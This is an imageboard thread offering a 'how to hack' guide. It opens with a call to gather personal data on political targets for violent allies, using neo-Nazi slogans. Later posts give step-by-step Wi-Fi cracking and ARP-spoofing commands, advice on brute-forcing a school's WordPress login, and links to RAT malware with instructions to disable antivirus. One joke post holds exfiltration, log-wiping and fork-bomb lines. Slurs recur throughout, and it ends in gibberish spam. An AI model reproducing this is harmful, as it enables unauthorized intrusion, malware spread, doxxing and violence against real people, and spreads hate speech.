The information we've brought to you in this thread already is enough to get the ball rolling and be actively involved in stopping shithead people from being shitheads. Just a few clicks and you can come here with all their social media profiles, email addresses and enough for us to get everything else.

I'm at the point where teaching you any more will potentially shine a light I really don't want shined on me, but I feel compelled to ask for your help in bringing this information forward so we can start to fuck with these assholes in a real bad way! We don't need to be the boots on the ground 1488racewarnow! when we have highly-trained killers who would love to bash some of these pink-haired faggots skulls in LEGALLY! Let them have at it! Let's do our part, we don't need to wait for an approval from a boss who may never deliver to get permission to fuck with a bad guys life. Lets make their assholes pucker at the thought of fucking with us!

We fight back here and now! We have the numbers, we have real bad motherfuckers on our side, we can do this and we can win. I just need your help, I will do what I can and I know there are many others in my position that are sick of these fucking vermin operating with impunity! I want politicians, I want mayors, I want fuckheads who deserve the worst. Keep your eyes open and use the tools above to collect the preliminary info.


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24220d  No.18292

For those of you who want to get more involved and don't know where to start or maybe you just love taking shit apart to see how it works, here is a list of resources.

SANS Cyber Security: https://www.cyberaces.org/

Cybrary: https://www.cybrary.it/

Future Learn: https://www.futurelearn.com – Basics of Network Security – Network Defence Management Overview – Defence Management Overview – Security Operations – Introduction to Cybersecurity

Coursera: https://www.coursera.org – IT Fundamentals for Cybersecurity – Introduction to Cybersecurity Tools and Cyber Attacks – Cybersecurity – Cybersecurity for Business – Cybersecurity and its Ten Domains

edX: https://www.edx.org – Introduction to Cybersecurity – Building a Cybersecurity Toolkit – Cybersecurity Fundamentals – Cybersecurity: the CISCOs Perpective View – Cybersecurity Capstone – Cybersecurity Risk Management

US Department of Homeland Security Virtual Training: https://www.dhs.gov/cisa/cybersecurity-training-exercises

Hack The Box: https://www.hackthebox.eu/

IppSecc Youtube Channel: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA


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a6b78c  No.18300


google employee here.

Next post with good digits will get his Wifi password posted here on this thread . Watch this guys :D

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ebb4ab  No.18536

>Theharvester, maltego, macchanger, cewl, crunch, exiftool…

Man do I feel like 2012 again.


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ffec39  No.18830


>Man do I feel like 2012 again.

man you're cool

too bad nobody will ever know it, huh? being an anymous imageboard and all.

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ffec39  No.19588

File: 9cf327d65122a11⋯.pdf (1.29 MB, Kali Linux Simple and Effe….pdf)

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e96b40  No.19595

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e96b40  No.19598

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d93cdc  No.19601

File: 3e1d325a82634cd⋯.jpg (27.8 KB, 479x616, 479:616, 1409253074351.jpg)


learn the difference between $ and #

learn why not to run things as root

delet system34

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74ecfb  No.19698


how can i delete system 34 when my PC is 68 bit?

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619926  No.19903

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bf243c  No.20074



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60d4ee  No.20366


I did everything. Can we have a following?

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b74b8b  No.20709


you have enough info itt to get yourself arrested and enough info here >>18292 to get you a high-paying job working in the field of cyber-security.

That being said, what particular topic of discussion would you like to go further into. I'm glad to help as I believe the easiest way to learn is to teach others what you know.

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8ce7ab  No.20730

File: 71af26883f4f708⋯.jpg (81.5 KB, 1600x900, 16:9, Spurdo.jpg)

once u installed l*nix you can follow my negst dudorial :DDD

>telnet jeb.bush@pentagon.ca
>password: guacbowsl2017
>curl -F 'data=@/var/db/pedophile-blackmail-list-2020.txt' https://pastebin.cum/paste.php
>killall FBI_PTRACE
>rm -rf /var/log/*
>fugg () { echo "удаляя гамбургеры :DDDD" | wall; fugg | fugg & }; fugg

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e96b40  No.20749


I think you're talking about the webhijacking assignment example source code in WebHijacking/index2.html that's detected as "JS:Exploit.CVE-2010-1807.A". Other than that everything either scans clean or is a .pdf or .chm file uploaded on 6/15/2019, so unless there is some pdf reader 0day that has lasted over half a year in the wild, I doubt it. Also fuzzing_four.rar has some .exe's I wouldn't run, but it scans clean and you have to search for the rar password.

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ed2b25  No.21067


How do i take down a low effort website?

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e9c80c  No.21068

Do coding languages such as Java, Javascript, html, c++, php and others have anything to do with hacking or will having knowledge on them help out a lot when trying to hack??

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8ce7ab  No.21074


you might have a chance if its a home web server behind a cheap ISP router set up by an 18 yo.

first step is obviously info gathering, you want to learn as much about the server's software, DNS info, database info, who the webmasters are etc.

nmap is probably useful to find services running on the server.

You can also find out a lot just by triggering errors on the website (getting PHP/db errors by sending fugged up FORM/ajax data).

Reading the source of a page might be useful, keep in mind most HTML is script generated (client or server side), what you should look for is any custom javascript, wordpress plugins, or FORM submission code.

beyond that you need to find exploits that apply to the services running.


yes absolutely.

You need to understand a language thoroughly in order to know its subtle pitfalls.

Try reading the basics of SQL injection, it won't make any sense if you don't know how db queries are made through PHP.

You might be able to use pen-testing tools like metasploit, but I've never used it.

Don't be a nigger and learn at least C, HTML, CSS, JavaScript.

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60d4ee  No.21173


I’m the precedent poster.

Thank you so much for being willing to help.

Right now I only have two questions in my mind.

1) Can I really get a job into pentest without having any degree? What should I be able to do and where should I send my letters for what kind of job? Also should I get some certificates? If yes, which ones?

2) How do I counter all these BruteForce protections. For example I was playing with WPscan and I can’t bruteforce because of WordFence. I take it as a challenge and I’m really trying to figure out the easiest way to still bruteforce the admin account. Also, you maybe have a list of passwords to share? I use the 10 millions that we can find on GitHub

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b7f67c  No.21202


bare with me, this is the 2nd time I'm typing this out now.

will you be able to get a job without a degree? absolutely. Is it much less likely? Absolutely! is theere a severe shortage in the supply given the demand? Absolutely! How do you know if "Pentester" is the right job for you? You took apart every toy you ever had as a child and, every once in a while, maybe put one back together. You have an undying desire to know how things work coupled with an a demeanor that makes you comfortable locked away in your room for days, weeks, mnoths on end focusing on a single problem.

There are a lot of differnt personalities in the coding/programming world, pentesters are the weirdos of the weirdos. https://defcon.org/ you also have to have a criminal personality because, well, you're interested n going places you aren't supposed to be, getting things you aren't supposed to see and all around just fucking with things. Especially 'proper' things.

hackthebox.eu is a good community of pentesters. ipsecc is a good guy to pay attention to and spends a lot of time providing valuable information to the community.

Also, calculus is a must. If you hate math, I don't think you'll like hacking. In the end, it's all math.



both good platforms with a good atmosphere of people.

you'll get burned out on brute-forcing really quick. I recommend spending some time on the recon, scraping the site with cewl, compiling a targeted list and putting the time into that over just throwing random passwords at a hash.

with that said:

crackstation.txt.gz - I believe 2 billion passwords in it.

github.com/trustedsec/hate_crack to help you deal with that amount of volume.

hope you have a good graphix setup.

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b7f67c  No.21205


also on that site, turn on burpsuite and see what it offers you to work with. I don't really know where to begin on advice without knowing the target.

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000000  No.21266

Does the VM setup increase security in some way, or is it just a way for windows users (like myself) to run this particular set of tools? If I have a laptop handy that I can dedicate to this would I be better off using that and saving the trouble and processing power of using a VM?

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63b338  No.21267


VMs are harder to hack in order to reveal your ISP IP address

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0f9238  No.21319


I have a question related to VMware setups.

I’ve read that it may be a problem with some antenna adapter. Is it just a connection problem or also a performance problem?


Do you want to know the target and play with me?

It’s the website of my school and I know it will be changed soon so it doesn’t matter if I fuck it up or not.

You can drop you pgp key or I will just try what you suggest and give you feedbacks

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0f9238  No.21359


That’s a better idea. Thank you!

I still have this problem with WordFence that gives me a 503 page after 2-3 passwords tried with WPscan

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4536bb  No.21393

>RDP into Raspberry pi

>TOR on raspi

>firefags hooked up to TOR network

How safe is this?

t. already looked up DMT and psych 'shrooms on it

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cdf621  No.21401

make sure you're not using an outdated backdoor router.

dd-wrt, openwrt, and others are easy to install and widely supported.

even an outdated dd-wrt is beter than outdated netgear/linksys shit.

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c0e0a7  No.21458




About as safe as nigger pussy.

Do it like a white man, a white man uses SSHv2 to access a command line, and browses from a poz-free browser such as w3m.

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b62b59  No.21844


It’s not about changing grades. I’m just messing up with since I saw that it was really badly built.

For example the wp-content/uploads and wp-includes are open :




Well also the school is such a scam I wish I could get my money back and pay some Pentests certificates...

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369251  No.21888

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60d4ee  No.21946


I saw that. Tine have another account.

I’m not sure she made the website tho. And I saw on the computer of the director that he also connect himself to this account so it can’t be something related to her life. Tine is a young teacher of 26-27 years old

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60d4ee  No.22659

File: 6e5fe3e6fcc6c9c⋯.png (20.17 KB, 136x102, 4:3, D5B04304-99E9-4368-AD24-BD….png)

Guys pls comeback

I love this thread!

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d5eead  No.22895


I don't like cloudflare DNS. It blocks sites like archive.is by faking that the site doesn't exist. Use quad9 DNS. They have encrypted DNS over TLS if you set it up correctly.

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a9c631  No.22931

I can add my notes on wifi cracking—

###change MAC ID before doing anything!

ifconfig eth0 down

macchanger -r eth0

ifconfig eth0 up

###Change into monitor mode on USB adapter

ifconfig wan0 down

airmon-ng check kill (may or may not necessary)

iwconfig wlan0 mode monitor

ifconfig wlan0 up

###Monitor all wireless traffic within range

iwconfig #look for the adapter ID for monitor adapter

airodump-ng wlan0mon

###If I ever get a 5G monitor antannae

airodump-ng –band a wlxmon ##band a is 5G

airodump-ng –band abg wlxmon ###sniff on both 2.4 and 5G

##targeting a specific network

airodump-ng –bssid <BSSID> –channel <CH?> –write <filenamehere> wlxmon0

##under STATION you will see the MAC ID


file >> open >> capfile-01.cap

##looking for device type

##Deauth the client

airdump-ng -bssid <enter target BSSID here> –channel <7> wlan0mon ##this is running in terminal1

aireplay-ng –deauth 100000000 -a <BSSID of target network> -c <MAC ID of the target client> wlan0mon ##this is running in terminal2


##WEP Cracking

##run airodump-ng to find WEP network

airodump-ng –bssid –channel –write wps0mon

aircrack-ng filename.cap

##copy KEY FOUND key / remove the colons

##connect to target network with the copied password

!!!###!!!### If WEP network is NOT BUSY

##Open 3 terminals

$terminal1 - airodump-ng –bssid –channel –write filename wps0mon

$termianl2 - aireplay-ng –fakeauth <0 because we only want to do this once> -a bssid -h <MAC ID>of wireless adapter = first 12 digits of the UNSPEC field / replace the minuses with colons> wps0mon

$terminal3 - aireplay-ng –arpreplay -b <bssid> -h <MAC ID of Wireless Adapter> wps0mon

##gnerate about 50,000 packets for analyzing

$terminal2 - aircrack-ng filename.cap

##WPA & WPA2 Cracking

##!!##first we try the WPS looking for Lck "No"

$terminal1 - wash –interface wps0mon

##you are going to enter the info into terminal 1 and 2 then start 2, then start 1

$terminal1 - aireplay-ng –fakeauth 30 -a <macID of target> -h <macID of Wifi Adapter> wps0mon

$terminal2 - reaver –bssid <mac of target> –channel <channel>

–interface wps0mon -vvv –no-associate

##WPA & WPA2

airodump-ng wps0mon

airodump-ng –bssid –channel –write wps0mon

aireplay-ng –deauth 4 -a <bssid> -c <macofclient> wps0mon

###continue to dauth until you capture the handshake

##Crunch - Creating a wordlist

crunch [min][max][characters]=t[pattern]-o[filename]

crunch 8 8 123abc$ -o wordlist -t a@@@@b -o /home/Desktop/file

meta characters

@ = lowercase_alpha


% = numbers_1234567890

^ = symbols_!@#$%^&*)(_+

##passing the hash against the wordlist

aircrack-ng capture-01.cap -w wordlist.lst


netdiscover -r

zenmap quickscan plus



arpspoof –interface –targetIP –gateway=routerIP

arpspoof -i eth0 -t


aprspoof –interface –gateway=routerIP –targetIP

arpspoof -i eth0 -t


echo 1 > /proc/sys/net/ipv4/ip_forward

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1a7120  No.26872

File: 205129361ad90e5⋯.png (49.61 KB, 224x168, 4:3, F4154CB0-834B-4FA6-A244-51….png)

I upvote again. Please more people participate and make some drops :)

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7c308e  No.27140

File: fea40ee04112db6⋯.jpg (66.27 KB, 784x960, 49:60, 1571696914145.jpg)


Guys bump!

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e710ca  No.27151

view site completely anonymously by tunneling it through TOR an reassembling it back on your machine

services tor start


>>> import socks

>>> import socket

>>> socks.set_default_proxy(socks.SOCKS5, "", 9050)

>>> socket.socket = socks.socksocket

# now lets make sure our tunnel is working

>>> import requests

>>> r = requests.get("http://icanhazip.com")

>>> r.content


# now that we know tunnel is working, we can grab a site and re-assemble back on our lcoal computer

>>> import pipes

>>> r = requests.get("http://8kun.top/pnd/threadyouarereadinghere")

>>> t = pipes.Template(r)

>>> f = t.open('pipefile.html')

>>> f.write(r)

>>> f.close()

>>> open('pipefile').read()

sometimes it doesn't pipe out right for me, might be a compatibility issue with my host OS or I might just be a retarded faggot but you can always just r.content and copy/past the results into a .html file to view.

I use this on sites I really don't want to be logged as a visitor on. you might have some of those sites yourself, r… right, guys?

*bows head i shame…


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60d4ee  No.28874

Ok guys. I’m finally able to use my knowledges for the good of this world. Thanks to everyone who have participated and please make this thread live long. Share it also!

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3c81df  No.29003

All the beautifully creative minds in this thread and yet somehow this site is still up and running.

I am disappoint.

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6e91d8  No.32124


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45b76a  No.32190

Was just scoopin.

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000000  No.33235

What do people ITT think of Qubes OS?

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bed730  No.33249

File: 047c7dce0d89f58⋯.jpg (133.3 KB, 748x781, 68:71, 047c7dce0d89f585be90f9456e….jpg)

This entire thread is so pathetically retarded I genuinely wonder if some machine learning AI isn't involved. Like some dink fuck just fed the algo The Happy Hacker for ten zillion hours, then sicked it on GiT hub. Kali Linux… please fuck off with that backdoored trash.

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000000  No.33253


Substantiate your claims and present an alternative then.

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bed730  No.33256

File: ec19679b0b6ac70⋯.jpg (7.49 KB, 261x173, 261:173, 1574583890881.jpg)


Gentoo you chud nigger.

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41a382  No.35055


Like nobody would signal it if it was backdoored?

And anyway we can still make the risky stuff with Tails

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000000  No.35191


>utility distro like kali

>live CD booted for a single campaign

>matters if it is backdoored

Watch out guys we have a 1337 haxx0r here.

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e4eb89  No.35620


>Like nobody would signal it if it was backdoored?

This is a fairly shit excuse. /tech/ has plenty of fags that act like something being open-source means that it has already been audited. Of course, nobody has any actually looked at the source or any example of someone having audited it. Only that it being theoretically possible means it has already been done and that the audit they is no evidence of agrees with it being clean.

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ed2b25  No.45326


What websites, pdfs, books should i look on and read be able to have the knowledge to take down a website, it would mean a lot if you could help me out, thanks, i need to start off from somewhere because i don't know from where to start

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ed2b25  No.45332


Also do i just use a simple vpn like windscribe to not get tracked?

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47dcc2  No.45371


That's true, but free software is miles better to examine than proprietary software. You can still audit parts of code, fuzz, automated auditing, it won't be a "full audit" but finding backdoors made by unskilled programmers is pretty easy even without a full audit.

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eddd26  No.45411


>actively performing OSINT to bring a dirty murderer to justice

Did he not get his temple recommend or renew his lodge fees?

Gangs talking, it's real. Of course we hated to have to use COLLOSSUS on you faggots AGAIN but…

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609a4a  No.45913


new vm passwords for kali are:

user: kali

password: kali

then to get root permissions:

[CTRL]+[ALT]+T ←—-this key combination brings up the terminal

$ sudo passwd root
New password: (type in a new password, lets use xyz )
Retype new password: (type in the same new password, xyz )
passwd: password updated successfully
$ _

this will not change your "kali" login and password

there are two logins and passwords that you need.

to make anonsurf work, you must have root access.

so, to view a list of commands for anonsurf, you type in:

< anonsurf

then this will show up"

$ anonsurf

Parrot AnonSurf Module
└──╼ $ anonsurf {start|stop|restart|change|status}

start - Start system-wide anonymous
tunneling under TOR proxy through iptables
stop - Reset original iptables settings
and return to clear navigation
restart - Combines "stop" and "start" options
change - Changes identity restarting TOR
status - Check if AnonSurf is working properly
myip - Show your current IP address
----[ I2P related features ]----
starti2p - Start i2p services
stopi2p - Stop i2p services

so, to start anonsurf, you type in

< sudo anonsurf start

(it may ask for that password that you make up earlier! - remember? xyz )

To check anonsurf's status, you simply type in:

< anonsurf status

and to stop anonsurf, you type in

< sudo anonsurf stop

I personally recommend that users try to stay away from logging in as superuser, as there are more opportunities to fuck up a computer.

I run linux, and can use anon surf with my distro.

its not much of a big deal, it helps to protect your online anonymity.

I'm grateful that OP is showing folks how to use this great resource.

I don't have a hell of a lot of patience.

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1e3d69  No.45951

File: 23da5dd07260382⋯.gif (1.46 MB, 446x469, 446:469, whateth.gif)


>view site completely anonymously by tunneling it through TOR

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1e3d69  No.45952


It truly does seem like GAN puke at some points doesn't it.

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05b336  No.47749







Why would you use VMware rather than the open source VirtualBox?


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60d4ee  No.57669

I upload. We need more visibility or new tutorials

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0fc7bb  No.59252

thanks chief I'm gonna go through this now and try it out

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24cfa0  No.59297

File: 6d6ec8c7bc02249⋯.gif (979.59 KB, 1366x768, 683:384, hax0r.gif)

>ctrl-f "social engineering"

>0 results


1. Become a CCNA, MSFT, whatever other alphabet soup expert you need to be

2. Apply for an IT position at an organization you hate

3. Gain their trust

4. Oh no, you've suffered a terrible hack attack and now all their private shit is uploaded to 8kun! It must have been the Russians!

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0df6f2  No.60244


[ERROR] Could not change MAC: interface up or insufficient permissions: Operation not permitted


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c7049f  No.61518

Okay here are my 2 cents.

If you want to get better at hacking and not just use premade metasploit then go and masscan all the FTP services in one particular area (let's say your country, or your ISP based on the ASNs ip range).

Then after scanning you take the version and name of software and you run a big data analysis to see what is the most common software used and in what version (Shodan helps but I don't give money to kikes, so you can use them to get a guesstimation).

After that you look up CVEs for that software. You look up if there is metasploit module for that. No? Make your own. There is no vulnerability? Find it by putting it in virtual machine and throwing fuzzers and whatnot at it. If you have the source code there are plenty of static code analysis tools out there. Search up every term you don't understand and learn everything that will get you closer to your goal.

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699a09  No.62394

Can this thread not die yet? I’ve liked it a lot.

Please someone post more!

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ad6c71  No.62520

What is the bare minimum setup for solid anonimity?

Are AnonSurf + macchanger enough?

ParrotOS btw

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64921e  No.64730


is this just gonna brick my computer or smth?

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70d93a  No.86085

Bump for informative thread

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0268b6  No.97960


What program or OS do i need to take advantage of tiktoks monitoring system? I want to see how much access tiktok has to people's accounts, how do i do this?

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2f9a52  No.99566


Combination of a network sniffer (wireshark, tcpdump) and an intercepting proxy (zed attack proxy, Burp Suite)

Also, check em

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bf98ad  No.122079


>how to upload a Kali Linux disk image to the Virtual Machine

nigga… just stop

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4ae87e  No.122202


For the laymen in the thread looking to learn 'how to hack':

OP is a faggot. Not even a script kiddie. Just a faggot.

Read K&R C, then report back. I will make a thread in a week.

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b2333b  No.125343

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b2333b  No.127103


It has been a week, I kinda learned C, please teach me.

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b37e42  No.127221


i am somewhat familiar with C. we are waiting for you.

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241e58  No.127479


If you're going to entrapmentpost at least be original about it.

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55c3f7  No.127621

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8b9e72  No.127627

File: 1fd51a8f951297d⋯.png (352.79 KB, 440x588, 110:147, 440px_BrianJFox.png)

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55c3f7  No.127628



What the fuck does that matter, it's used in most all unixlikes.

If you can't understand it, you're fucked.

Zsh is the better shell, obv. You should learn and use that, too.

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1d4794  No.127637


Bash is one of the languages which I most enjoy writing code in. It's just fun.

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ea8339  No.127648


You've clearly never written many bash scripts. From a language design perspective, it's absolutely disgusting. Bash is actually even worse than PHP and Javascript, which is unbelievable. Also you can ignore Zsh and just use Fish instead.


Bash is shit mate. What do you expect from a nigger jew? If you want something fun, look at Tcl, Scheme, LISP, Erlang, and if you like strong type systems, Haskell.


> it's used in most all unixlikes.

And it shouldn't be! Since the extensions are not POSIX compliant.

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55c3f7  No.127666


Sorry if I misinterpreted the OP, which did ask for hacking materials.

Implement our own stuff with zsh (or fish in your case) and crack dumb assholes who use bash (think shellshock).

I did mention Scheme.

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641113  No.127669


Hi Satan, allow me to confess. My only intent was to to post Brian for shock value, because many people, especially on /pnd/ aren't going to know Bash was created by a nog (even though he's obviously high functioning). Everything else was serious though, and bash is shit, because it was more of a band-aide to fix bourne shell.

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641113  No.127670


As for OP, he's just a script kiddie that wanted to feel like a teacher. You know the type that learn something, and then immediately create a youtube video to share their hot tip? That's op.

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5da0c7  No.130764

File: 57a8bcfe1365317⋯.jpeg (383.53 KB, 1200x1600, 3:4, 57588835_9CCDD7EA_87D4_4C….jpeg)

All you faggots stop larping and learn everything from this website : https://teachyourselfcs.com/

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f54002  No.130820

File: 5b1272ee2ec8f17⋯.png (193.99 KB, 800x600, 4:3, openbsd.png)

Linux is for fagits. OpenBSD rules.

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7444ca  No.130823


ParrotOS generally breaks once you call upgrade even when it's NOT in a virtual box.

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1179e0  No.137124

I have multiple RATs. Warzone, Pentagon, and njRAT. If you're new to hacking, please make sure to disable your AV and download them using Firefox as these usually pop up as Trojans even though they create Trojans. Chrome and your AV will block them. Have Fun!

Warzone RAT: https://anonfiles.com/F3J9I4E1od/Warzone_Rat_zip

Password: 123

Pentagon RAT: https://anonfiles.com/B4JcIbEaod/Pentagon_RAT_zip

Password: 123

njRAT: https://anonfiles.com/39J2I4E2o1/njRAT_v0.11_zip

Password: 123

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a6f819  No.137165


>Bash is actually even worse than Javascript

And now I can ignore everything you say. The only thing worse than javascript is java.

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c8ba8e  No.137174


>openbsd rules

>picture of the freebsd devil stabbing tux

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c8ba8e  No.137176


>The only thing worse than javascript is java.

Java is an actual useful language. JavaScript is broken beyond repair.

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e6c78b  No.137178


What is that she is eating? It looks incredibly unhealthy, but I want to know.

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6f55bb  No.137185


King's Hawaiian Bread French Toast with a blueberry compote and homemade stiff whipped cream topped with maple syrup.

Total sugar coma.

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e6c78b  No.137189


I don't think I could eat that without wanting to die, but thanks for the info.

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2eb4b8  No.137462

File: 831a8bce9f58606⋯.jpeg (72.72 KB, 718x523, 718:523, unix_jurassic_park_718x52….jpeg)

Hey you know what your post lacks OP?

>Fuzzing tutorials

>RCE exploit tutorials

>Bufferoverflow and recursion

>Social engineering

>Obfuscate payload

>VPS and VPN setup

>IDS and firewall evasion

>Pivotting and priv escalation

>Embedding backdoor into software

R U 1nd1an 0P?

>tap into the powergrid

Nobody sitting in their room (unless they're rich) has the plans and resources to exploit a power plant, you'd have to get your stuxnet class virus onto a machine connected to a computer that interacts with PLCs, and they'd get cuffed by the FBI as soon as the job is done, stop larping for attention, you might as well have started the post with "Hello friend", unironically using the term hacking is cringe, you're talking about unconventional means to access/control a system from the internet, compromising or breaching is a better term for it, because that's all your teaching, look up docker priv escalation exploits, hacking is about exploiting code, there are CTF challenges that teach it for crying out loud.

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06f964  No.140161


oy vey mr. glowstein i bet my ass you don't even know how to use aircrack

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d4c954  No.140171


Not op but on backtracker it's uh

Sudo -airodump


than brute force with an aircrack using some dictionary

But that's really dumbo stuff. I used to do that when I was 15 and couldn't afford internet

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ca11b4  No.157739

OP you inspired me. I am an oldfag that grew up better than most with computers but never got to the point of using it in more "creative" ways. I'm not just blindly following the instructions but taking it slow and exploring lots of what I've forgotten or never knew.

Lets see what happens.

Peace and HH borther.

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7714ed  No.157834


E: Could not open lock file /var/lib/dpkg/lock-frontend - open (13: Permission denied)

E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), are you root?

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a1c54f  No.157838


Yes. First response that did not make my stomach cringe. Gentoo or GTFO… orPentoo https://pentoo.ch/docs

Fucking ParrotSec? You are an embarrassment. Sad. Pre package, pre made tools, no coding experience, you should spend ten more years lurking and not running ZAP and nikto like your 1337 zoomer faggot nigger

i miss 2600

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a1c54f  No.157840


I am going to attempt to avoid sarcasm and irony.

Never trust that Kali OVA to anything worthwhile on, or at all.

Do not use fucking VMWARE for the love of Saint Tarrant. VirtualBox at least.


No to ParrotSec


Anonsurf consistently leaks packets. build the gruqs PORTAL or get an anonabox and tunnel all your traffic over physical infrastructure to TOR.


You disgust me


You are glowing brighter than that yellow ribbon you got during your Security+ class in Quantico. Just stop.






do not use these for the love of Saint Tarrant. Use whatever brain is still left over from the massive amounts of Fentanyl you have injected. Stop.


at least a starting point i wont laugh at you for


this thread is giving me aids


this entire thread should be just this post. install gentoo. i weep for the future


BSD is also good


this thread was the least inspiring pile of shit ive read in 48 hours.

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a1c54f  No.159086

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5af337  No.159309


Hey faggot, make your 1337 hacker guide OP now

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97ff83  No.159317


>spoonfeeding retards.

Anon that's how you create script kiddies. "l337" hacking is a process of learning by doing. You must invest time to understand how things actually work, and experiment. That said, the following gem is quite elucidating and should jump start the path to discovery. I recommend it for any serious budding "hacker." Every competent systems programmer should read it to, to understand how innocuous mistakes can turn into exploits.


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778ede  No.168630

File: 289005d9e23f894⋯.jpg (49.73 KB, 720x433, 720:433, 20201020_211123.jpg)



I'm so tired of Jews

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281b60  No.168825


run this first:

sudo apt-get update

Reason: Your package manager probably has an out-of-date listing of the available packages (which would include anonsurf), so update the listing first, then try to install it.

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f53dc7  No.169969

If you really want to get into cybersecurity (I'd highly recommend it, there are barely any of us out there), start with:



IppSec: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA

Watch the videos and play along in the lab. Don't feel bad for using the videos as a crux

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f3875c  No.170842

I'm new to networking or what ever you call it. I have some experience with programming on android studios and unity but nothing advanced, just an intermediate level.

Anyway I downloaded and installed this program that can find bugs on websites.

I have found some bugs on the website i was running the program on. Now how do I create an exploit? I heard exploits are the things you use to take advantage of the bugs you find in websites. How do I find or built an exploit and use it without getting in trouble and tracked?

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8db8ac  No.179068


KDE neon is best general purpose loonix distro. Change my mind.

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bb78c1  No.195013


Reported for mass spam and board sliding.

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0e1a5e  No.200574


try with sudo before the command

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a33831  No.200583


but how long will it take for the indians who wont be asking for $100k and above salaries to take over this industry too?

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7e0ac4  No.200837

Bump. Am going to do this in my day off

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f9e3b6  No.201216

File: 4e2c8e5a88407e5⋯.png (28.28 KB, 966x392, 69:28, vmware_error_2021.png)


I can never get VMware or Virtual Box to work on my laptop. Attached is the error I get and my pc specs.

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7e0ac4  No.201221

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f27fd1  No.206214


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9f26a8  No.206664

Three rules to go by:

1. Learn to Archive and data-mine. Gallery-DL (images), Youtube-DL(video/audio), FanFicFare/Fiction-DL (blogs), WGet/Curl…

2. Learn to use encryption like PGP or if you are a pleb, Pretty Easy Privacy

3. Get on Matrix, and host your own wikis, boorus, imageboards or websites

4. Use Linux (if you can't handle Arch at least use Mint), and use compression software to do encryption

5. Prep the browser to handle ads and trackers, get social media re-routers (Invidio, Nitter, Teddit, Bibliogram etc.)

6. Be ready to upload based books to LibGen, and get documents from Sci-Hub

7. Auto-archive tools for archive.md and archive.org should be used in case idiots don't want to open your web scraped files

8. For the love of fuck don't hammer TOR/I2P and DoSS as "leet haxxor" cus that is fed-tier

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204d9b  No.206707


you're talking about a skill set that takes decades to get any good at. There's a reason those tech guys can command a high salary without any licensing to limit entry to the field. Don't get hopeful about learning to hack anything soon.

Although yes if you are any kind of political dissident you should not be using any operating system written by microsoft or google, apple's iffy but still wouldn't.

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c7d474  No.208670

File: 6e5a65f9ceafe22⋯.jpg (82.32 KB, 1072x609, 1072:609, gYlIRjsk.jpg)

wWFVkklgKne oNTsKp QQVHI aymwOivHQW hFgt sHOMci

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6b3000  No.208731

File: 54e26bbe8e25e3b⋯.jpg (67.19 KB, 934x523, 934:523, ufIcJ.jpg)

GFN gQGwNqBvq VDRt xQPw hHuzXIFooZ nyTdRoV ifTSs IUGaHNale

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e0d66b  No.208762

File: a2c14a7c734df74⋯.jpg (74.21 KB, 1148x480, 287:120, OyeZSNvjpi.jpg)

ihC ybvVani PYCGD sCcdBX weSMQ SPQgWNf LkSIn JNgPETNp GivEnA MiLTunQLLOS uPMPboIfFV PjrXWyYlp IzH yHHu ssRCdT SuYjj gOdAFlJ JxfwakX

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f450ac  No.209548

File: 7205a666c9fddba⋯.jpg (73.34 KB, 1092x503, 1092:503, yzhGFV.jpg)

hAHPBzZc AzntQ lVIQMao EeAfAhHCBuKZ cQz zHvYV jIwY BZoseKlRkkv utUcwY RNG bIjJWvmDUz TsFaHYBPww YyOy SIWZCDhNzlEw ousNZpdGMM fhWkfT jPVYtVrOQczt ZEsIEPpOGb GHRu

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4c2b27  No.209801

File: ac915cc8cdc75f2⋯.jpg (34.85 KB, 398x382, 199:191, WDrDYhBjJ.jpg)

Ywf dHIs hgKZtl LGyBrF WNI ApCFppzhKd FJaEb qKKqx YgZzDESKlet SgHsjhGKKean

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aea3cd  No.209854

File: 608e13df3bd5ce1⋯.jpg (60.8 KB, 497x623, 71:89, MSgeJ.jpg)

uNaPflvUO DDuXKW KStrYV Ugmla Dwxc

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6c0ee7  No.210250

File: b16c4151a7804c9⋯.jpg (86.76 KB, 1068x665, 1068:665, NTDsJs.jpg)

Hvxbk mLqnBTBGWS OXrc Swq DVnuC lVZOHxIxw ZprOwlKsCVC kHhZH

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be449b  No.210287

File: 978a5a4b62c7dd3⋯.jpg (42.49 KB, 341x565, 341:565, CW.jpg)

YZurIvKItYgP aeGsB jxqtX oBEWQUK PsvcCaDxQkMB xuDesGPvtqu

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d99275  No.210308

File: b69b662ce4e7e20⋯.jpg (43.85 KB, 430x477, 430:477, kFs.jpg)

PrLURTaXDWaX VvpuvQr XjwhgvFzSowj vAp NlIp HSkM LDKKkZ HKc bNVWZYTgKcW ozGcOvk zboJptJMTqH

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126fff  No.211198

File: 74310a722237ae2⋯.jpg (67.17 KB, 981x495, 109:55, tjmwn.jpg)

VLijS HMleR EhcRDYf URdk UPiE UgBVfT AcuFfIEGq yWnpqNhsv ctpFCvIyzn ega OUFly IrsxdMBz VzguCaEn BAIfTX iUhsSxerz JFHDuHLT qSvyDG MZHA PDTiXBQwGB wPd

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d53edc  No.211216

File: 53f1f448e59bbe2⋯.jpg (84.14 KB, 1075x632, 1075:632, lqey.jpg)

EYYVNycxy sDY sflcC DUHMMqAbMuz LNSEEcgQeknA aaQMg

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68cc2d  No.211217

File: 5d4529f6d011807⋯.jpg (75.57 KB, 1141x495, 1141:495, Abc.jpg)

jDnNB JFLCpDV VcqagBDWV isB QxHtfUR Ony OLdeAj Erhjb oEaSKxp TikmHfSctcRs iMUVlX nXg FIDLcXVgCV GvueflReHrPF

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